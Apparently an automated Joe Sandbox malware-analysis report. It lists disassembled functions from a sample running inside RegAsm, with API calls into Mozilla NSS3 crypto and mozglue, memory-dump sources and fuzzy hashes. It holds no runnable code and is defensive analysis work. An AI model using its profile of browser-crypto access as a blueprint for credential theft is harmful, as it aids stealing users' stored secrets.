                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: __allrem
                                                                                • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                                                • API String ID: 2933888876-3221253098
                                                                                • Opcode ID: 282b1c7f8b912b341f7d165770c59c385632c13f80c747ff966193d6d44ccb62
                                                                                • Instruction ID: f8586a4e9f21cf858b78bf99f3b35300a53bfdd82fbeeb11cca187b0d45f7ecb
                                                                                • Opcode Fuzzy Hash: 282b1c7f8b912b341f7d165770c59c385632c13f80c747ff966193d6d44ccb62
                                                                                • Instruction Fuzzy Hash: 3461A471B003099FDB24CF68DD54A6A7BB1FF49314F148528E91AAB7C0DB39E846CB91
                                                                                Function 0040F388 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • strlen.MSVCRT ref: 0040F39C
                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 0040F3BD
                                                                                  • Part of subcall function 0040F1D6: strlen.MSVCRT ref: 0040F1E2
                                                                                  • Part of subcall function 0040F1D6: strlen.MSVCRT ref: 0040F1F8
                                                                                  • Part of subcall function 0040F1D6: strlen.MSVCRT ref: 0040F291
                                                                                • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,00000000,?,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF), ref: 0040F3EA
                                                                                • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 0040F4B4
                                                                                • ??_V@YAXPAX@Z.MSVCRT ref: 0040F4C5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strlen$QueryVirtual
                                                                                • String ID: @
                                                                                • API String ID: 3099930812-2766056989
                                                                                • Opcode ID: b4548a7c55d638266e0508bb0abe080468fb6bf61126806d7a12c96a6de38829
                                                                                • Instruction ID: 466afe4c3685285f2ebe0489a4595054022d0f09b2a7b9cf482a5e365b85556b
                                                                                • Opcode Fuzzy Hash: b4548a7c55d638266e0508bb0abe080468fb6bf61126806d7a12c96a6de38829
                                                                                • Instruction Fuzzy Hash: 36416971A00109AFEF24DE90CD45AEF7BB6EB98354F14803AF901B2190D7798E54DBA8
                                                                                Function 6C91AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C91AB3E,?,?,?), ref: 6C91AC35
                                                                                  • Part of subcall function 6C8FCEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C8FCF16
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C91AB3E,?,?,?), ref: 6C91AC55
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C9310F3
                                                                                  • Part of subcall function 6C9310C0: EnterCriticalSection.KERNEL32(?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93110C
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931141
                                                                                  • Part of subcall function 6C9310C0: PR_Unlock.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931182
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93119C
                                                                                • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C91AB3E,?,?), ref: 6C91AC70
                                                                                  • Part of subcall function 6C8FE300: TlsGetValue.KERNEL32 ref: 6C8FE33C
                                                                                  • Part of subcall function 6C8FE300: EnterCriticalSection.KERNEL32(?), ref: 6C8FE350
                                                                                  • Part of subcall function 6C8FE300: PR_Unlock.NSS3(?), ref: 6C8FE5BC
                                                                                  • Part of subcall function 6C8FE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C8FE5CA
                                                                                  • Part of subcall function 6C8FE300: TlsGetValue.KERNEL32 ref: 6C8FE5F2
                                                                                  • Part of subcall function 6C8FE300: EnterCriticalSection.KERNEL32(?), ref: 6C8FE606
                                                                                  • Part of subcall function 6C8FE300: PORT_Alloc_Util.NSS3(?), ref: 6C8FE613
                                                                                • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C91AC92
                                                                                • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C91AB3E), ref: 6C91ACD7
                                                                                • PORT_Alloc_Util.NSS3(?), ref: 6C91AD10
                                                                                • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C91AD2B
                                                                                  • Part of subcall function 6C8FF360: TlsGetValue.KERNEL32(00000000,?,6C91A904,?), ref: 6C8FF38B
                                                                                  • Part of subcall function 6C8FF360: EnterCriticalSection.KERNEL32(?,?,?,6C91A904,?), ref: 6C8FF3A0
                                                                                  • Part of subcall function 6C8FF360: PR_Unlock.NSS3(?,?,?,?,6C91A904,?), ref: 6C8FF3D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                • String ID:
                                                                                • API String ID: 2926855110-0
                                                                                • Opcode ID: 6192a47334131936451663beb287be34aee58537f347b5b84964e45ca2459cd5
                                                                                • Instruction ID: a0f9cb0a3e837695a26b285e70c9a158e238f226275398d1e757e9ad1a416a1c
                                                                                • Opcode Fuzzy Hash: 6192a47334131936451663beb287be34aee58537f347b5b84964e45ca2459cd5
                                                                                • Instruction Fuzzy Hash: 79312BB1E0461A5FEB008F69CC419AF777AAF94728B188528E8149BB41EF31DD19C7A1
                                                                                Function 004114EE Relevance: 10.6, APIs: 7, Instructions: 119stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004114F3
                                                                                • strtok_s.MSVCRT ref: 0041151E
                                                                                • StrCmpCA.SHLWAPI(00000000,0042655C,00000001,?,?,?,00000000), ref: 00411561
                                                                                • StrCmpCA.SHLWAPI(00000000,00426558,00000001,?,?,?,00000000), ref: 0041158F
                                                                                • StrCmpCA.SHLWAPI(00000000,00426554,00000001,?,?,?,00000000), ref: 004115B4
                                                                                • StrCmpCA.SHLWAPI(00000000,00426550,00000001,?,?,?,00000000), ref: 004115E5
                                                                                • strtok_s.MSVCRT ref: 0041161B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strtok_s$H_prolog
                                                                                • String ID:
                                                                                • API String ID: 1158113254-0
                                                                                • Opcode ID: e553d5132b9e7f86e8479414b2ec2d2c5e35635a680dc74e7bbc93f944b43b53
                                                                                • Instruction ID: 68ea9c5229acb73eb4f6ce9ce1e3a2e95253cdc2d87cf327e38e290520796c14
                                                                                • Opcode Fuzzy Hash: e553d5132b9e7f86e8479414b2ec2d2c5e35635a680dc74e7bbc93f944b43b53
                                                                                • Instruction Fuzzy Hash: 4B41AF70A00106EBDB14CF64DD81BEAB7E8BB58315F10052FE206E66A1DB3CCA858B59
                                                                                Function 6C8F8C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_Now.NSS3 ref: 6C8F8C7C
                                                                                  • Part of subcall function 6C999DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C9E0A27), ref: 6C999DC6
                                                                                  • Part of subcall function 6C999DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C9E0A27), ref: 6C999DD1
                                                                                  • Part of subcall function 6C999DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C999DED
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8F8CB0
                                                                                • TlsGetValue.KERNEL32 ref: 6C8F8CD1
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C8F8CE5
                                                                                • PR_Unlock.NSS3(?), ref: 6C8F8D2E
                                                                                • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C8F8D62
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8F8D93
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                • String ID:
                                                                                • API String ID: 3131193014-0
                                                                                • Opcode ID: 50ed4940f791bb47e9362a346ff99a9d401d11922ead6d0471d213753888fe23
                                                                                • Instruction ID: eec728f3c0964ad3695c312b968f637eec2fe011a5ddc637bf4770ad276325ef
                                                                                • Opcode Fuzzy Hash: 50ed4940f791bb47e9362a346ff99a9d401d11922ead6d0471d213753888fe23
                                                                                • Instruction Fuzzy Hash: 54318C71A01205AFE720AF69CD407AAB770BF26358F140536EA2967B50D730E926C7E1
                                                                                Function 6C8F2E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C8EE728,?,00000038,?,?,00000000), ref: 6C8F2E52
                                                                                • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8F2E66
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8F2E7B
                                                                                • EnterCriticalSection.KERNEL32(00000000), ref: 6C8F2E8F
                                                                                • PL_HashTableLookup.NSS3(?,?), ref: 6C8F2E9E
                                                                                • PR_Unlock.NSS3(?), ref: 6C8F2EAB
                                                                                • PR_Unlock.NSS3(?), ref: 6C8F2F0D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                • String ID:
                                                                                • API String ID: 3106257965-0
                                                                                • Opcode ID: 1d1150007507415326338f9badfa0458c2166390c9fed5e08104e829e514b8c2
                                                                                • Instruction ID: d64bf537c6db0637aa8c971fba65305345bc27ec3c6a42012b056d9d1e2bcc6d
                                                                                • Opcode Fuzzy Hash: 1d1150007507415326338f9badfa0458c2166390c9fed5e08104e829e514b8c2
                                                                                • Instruction Fuzzy Hash: 553137B5A00645ABEB209F28DD448B6B778EF56298B188934EC1883B11F735DC65C7E1
                                                                                Function 6C93CEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_ArenaMark_Util.NSS3(?,6C93CD93,?), ref: 6C93CEEE
                                                                                  • Part of subcall function 6C9314C0: TlsGetValue.KERNEL32 ref: 6C9314E0
                                                                                  • Part of subcall function 6C9314C0: EnterCriticalSection.KERNEL32 ref: 6C9314F5
                                                                                  • Part of subcall function 6C9314C0: PR_Unlock.NSS3 ref: 6C93150D
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C93CD93,?), ref: 6C93CEFC
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C9310F3
                                                                                  • Part of subcall function 6C9310C0: EnterCriticalSection.KERNEL32(?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93110C
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931141
                                                                                  • Part of subcall function 6C9310C0: PR_Unlock.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931182
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93119C
                                                                                • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C93CD93,?), ref: 6C93CF0B
                                                                                  • Part of subcall function 6C930840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C9308B4
                                                                                • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C93CD93,?), ref: 6C93CF1D
                                                                                  • Part of subcall function 6C92FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C928D2D,?,00000000,?), ref: 6C92FB85
                                                                                  • Part of subcall function 6C92FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C92FBB1
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C93CD93,?), ref: 6C93CF47
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C93CD93,?), ref: 6C93CF67
                                                                                • SECITEM_CopyItem_Util.NSS3(?,00000000,6C93CD93,?,?,?,?,?,?,?,?,?,?,?,6C93CD93,?), ref: 6C93CF78
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                • String ID:
                                                                                • API String ID: 4291907967-0
                                                                                • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                • Instruction ID: 8aeb78b8cca883b7237caf64d2bab9cb61bb18adf706031dcb6c196a10402d25
                                                                                • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                • Instruction Fuzzy Hash: 4211E4B9E007306BEB00AA667C41B6BB5EC9F6564DF005139EC0DD7741FB60D91886B1
                                                                                Function 6C7F84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F84F3
                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F850A
                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F851E
                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F855B
                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F856F
                                                                                • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F85AC
                                                                                  • Part of subcall function 6C7F7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C7F85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F767F
                                                                                  • Part of subcall function 6C7F7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C7F85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F7693
                                                                                  • Part of subcall function 6C7F7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C7F85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F76A7
                                                                                • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F85B2
                                                                                  • Part of subcall function 6C7D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C7D5EDB
                                                                                  • Part of subcall function 6C7D5E90: memset.VCRUNTIME140(6C817765,000000E5,55CCCCCC), ref: 6C7D5F27
                                                                                  • Part of subcall function 6C7D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C7D5FB2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                • String ID:
                                                                                • API String ID: 2666944752-0
                                                                                • Opcode ID: 8381ea261d35421a4bd3d7fee685bf042098e152d281d617894526add99b3abb
                                                                                • Instruction ID: df57fa6152dc8d4ec771b0fb50a789f13857bd60837f4c8cf82ddd10087ae055
                                                                                • Opcode Fuzzy Hash: 8381ea261d35421a4bd3d7fee685bf042098e152d281d617894526add99b3abb
                                                                                • Instruction Fuzzy Hash: CC21EF752006018FDB24DB29C8C8A5AB7B4AF4130CF24093CE56BC7B41DB34F949CB80
                                                                                Function 6C8E8C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32 ref: 6C8E8C1B
                                                                                • EnterCriticalSection.KERNEL32 ref: 6C8E8C34
                                                                                • PL_ArenaAllocate.NSS3 ref: 6C8E8C65
                                                                                • PR_Unlock.NSS3 ref: 6C8E8C9C
                                                                                • PR_Unlock.NSS3 ref: 6C8E8CB6
                                                                                  • Part of subcall function 6C97DD70: TlsGetValue.KERNEL32 ref: 6C97DD8C
                                                                                  • Part of subcall function 6C97DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C97DDB4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                • String ID: KRAM
                                                                                • API String ID: 4127063985-3815160215
                                                                                • Opcode ID: 27cb04b2ac612ca51bde536317b8a1d1cfd4dde5a87ed92861a7331be9b353d0
                                                                                • Instruction ID: 4aa76d46290ac83e707c4a50fdeb3c807bad9d6cf20c1b333f55ef6d81ffb56f
                                                                                • Opcode Fuzzy Hash: 27cb04b2ac612ca51bde536317b8a1d1cfd4dde5a87ed92861a7331be9b353d0
                                                                                • Instruction Fuzzy Hash: 392180B1605A058FD750AF7CC58456DBBF4FF4A308F06896AD8888B711EB35D886CB92
                                                                                Function 6C9E2C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_EnterMonitor.NSS3 ref: 6C9E2CA0
                                                                                • PR_ExitMonitor.NSS3 ref: 6C9E2CBE
                                                                                • calloc.MOZGLUE(00000001,00000014), ref: 6C9E2CD1
                                                                                • strdup.MOZGLUE(?), ref: 6C9E2CE1
                                                                                • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C9E2D27
                                                                                Strings
                                                                                • Loaded library %s (static lib), xrefs: 6C9E2D22
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                • String ID: Loaded library %s (static lib)
                                                                                • API String ID: 3511436785-2186981405
                                                                                • Opcode ID: 4dd7526521388464261dad98a1b62b95371d27b233d83ecd4ab3639da618bae8
                                                                                • Instruction ID: 68cdf309109b7ac8481c819f5d988dc5869e41fb0212239897077511a60aeaa1
                                                                                • Opcode Fuzzy Hash: 4dd7526521388464261dad98a1b62b95371d27b233d83ecd4ab3639da618bae8
                                                                                • Instruction Fuzzy Hash: 6A11EEB07007068FEB298F19DC44AA677B9AF6A30DB18C52DD909C6B01D731D849CBA1
                                                                                Function 6C930FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C8D87ED,00000800,6C8CEF74,00000000), ref: 6C931000
                                                                                • PR_NewLock.NSS3(?,00000800,6C8CEF74,00000000), ref: 6C931016
                                                                                  • Part of subcall function 6C9998D0: calloc.MOZGLUE(00000001,00000084,6C8C0936,00000001,?,6C8C102C), ref: 6C9998E5
                                                                                • PL_InitArenaPool.NSS3(00000000,security,6C8D87ED,00000008,?,00000800,6C8CEF74,00000000), ref: 6C93102B
                                                                                • TlsGetValue.KERNEL32(00000000,?,?,6C8D87ED,00000800,6C8CEF74,00000000), ref: 6C931044
                                                                                • free.MOZGLUE(00000000,?,00000800,6C8CEF74,00000000), ref: 6C931064
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
